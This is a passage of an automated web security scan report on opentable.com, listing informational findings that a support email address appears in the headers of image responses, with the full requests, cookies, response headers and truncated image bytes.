Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:51 GMT

GIF89a).?....................................................!.......,....).?....p-.@.8....`(.di.h..l..p,.tm.x..|....pH,....r.............v..z...xL.....z.n....|N.....~..................p..............
...[SNIP]...

8.25. http://www.opentable.com/img/borders/modules/popup_corners.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/popup_corners.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/popup_corners.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2156
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:57 GMT

GIF89ad.P................SMH...........~..................($%kii...B8,....u......................................................e]S........................LB7...................................{....
...[SNIP]...

8.26. http://www.opentable.com/img/borders/modules/tabmanager_coners_thick.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/tabmanager_coners_thick.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/tabmanager_coners_thick.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 788
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:52 GMT

.PNG
.
...IHDR...v...G......3.....BPLTE...................................................................z$.....tRNS.............................kIDATx....r.@...I...r.q... ..!.\S%.....*.bM....X.+u
...[SNIP]...

8.27. http://www.opentable.com/img/buttons/btn_findatableNew.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttons/btn_findatableNew.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttons/btn_findatableNew.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4316
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

.PNG
.
...IHDR...m.........L.`....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.28. http://www.opentable.com/img/buttons/close_popup.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttons/close_popup.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttons/close_popup.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 916
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:53 GMT

GIF89a...................SMH...........~..................($%kii...B8,....u......................................................e]S........................LB7...................................{....
...[SNIP]...

8.29. http://www.opentable.com/img/buttons/poweredbyOpenTableStacked.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttons/poweredbyOpenTableStacked.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttons/poweredbyOpenTableStacked.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2271
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

.PNG
.
...IHDR.......0......*......PLTE...................................Z..........AA.....%%..........II.....`............................VV........i..r..f.22..........GG.............++......c..
...[SNIP]...

8.30. http://www.opentable.com/img/buttons/results-grid-buttons-restrefAB.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttons/results-grid-buttons-restrefAB.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttons/results-grid-buttons-restrefAB.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4296
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

GIF89a..6......n<2(.......uC8,............4+"....../'."..............+$...x.....................................' ..........8/%.
..........A6*...........f..n.................f......................
...[SNIP]...

8.31. http://www.opentable.com/img/buttonsNew/secondary_left_medium.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttonsNew/secondary_left_medium.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttonsNew/secondary_left_medium.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 423
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:12 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:52 GMT

.PNG
.
...IHDR.....................PLTE......($%523...................................................................................................kii.................Qr...+tRNS..................
...[SNIP]...

8.32. http://www.opentable.com/img/buttonsNew/secondary_right_medium.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/buttonsNew/secondary_right_medium.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/buttonsNew/secondary_right_medium.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 479
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:12 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:50 GMT

.PNG
.
...IHDR.......\.....jK.r....PLTE......($%523...xVw.............................................................................................kii......................+tRNS..................
...[SNIP]...

8.33. http://www.opentable.com/img/common/1x1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/1x1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/1x1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:02 GMT

GIF89a.............!.......,...........D..;

8.34. http://www.opentable.com/img/common/Badge_Anon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/Badge_Anon.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/Badge_Anon.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 153
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:36 GMT

GIF89a.....................n.........!.......,..........^X@......}.....`(.d.    ......\.....h..sf.@.m..Ed.$....*.s'.>.P%.9.......Y.Y....oM..|N..;>.$o.$..;

8.35. http://www.opentable.com/img/common/default_img_DC.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/default_img_DC.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/default_img_DC.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 366
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:35 GMT

GIF89a4.8............................!.......,....4.8....8...0.B..8.}..`hybi......n.+.s].........+%t...#..l2u..@@.Z.U...........)+`.:.Mv3..\\.(.....9....|.G...0o.T...}...z.7.iW..WLj....>t.j...U..b..V
...[SNIP]...

8.36. http://www.opentable.com/img/common/icons_final2.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/icons_final2.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/icons_final2.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4337
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:38 GMT

.PNG
.
...IHDR.............t..'....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...{LTW.....0....+E.....Q7l5].Kw..u[.+...p.......&.>..M...Q..I....Ku......C\6....(:...E.....f.o8.9\....]..IN..{...|......
...[SNIP]...

8.37. http://www.opentable.com/img/common/img_diningChk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/img_diningChk.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/img_diningChk.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2470
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:31 GMT

GIF89aN.U............z.....y..f........z........~....................................................................j.................h....................f..u..w...........u........b.....d..{.......
...[SNIP]...

8.38. http://www.opentable.com/img/common/privatedining_startpagepromo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/common/privatedining_startpagepromo.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/common/privatedining_startpagepromo.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4534
Content-Type: image/jpeg
Last-Modified: Fri, 23 Sep 2011 02:09:48 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:34 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...

8.39. http://www.opentable.com/img/dnbase/arr_carot_gray.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/arr_carot_gray.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/arr_carot_gray.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 49
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:01 GMT

GIF89a.......fff...!.......,................z^*.;

8.40. http://www.opentable.com/img/dnbase/circle_1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/circle_1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/circle_1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 132
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:28 GMT

GIF89a........cN.(..H9.$.}qZ.........y.e.....................!.......,..........1.!"F)C..@8`.........Y.mh..y....5......Lu."..b.h$..;

8.41. http://www.opentable.com/img/dnbase/circle_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/circle_2.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/circle_2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 133
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:28 GMT

GIF89a........cN.(..H9.$.}qZ.........y.e.....................!.......,..........2.!"F)C..@8`..........V'.........~..XLc..:E.IB.`4...;

8.42. http://www.opentable.com/img/dnbase/circle_3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/circle_3.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/circle_3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
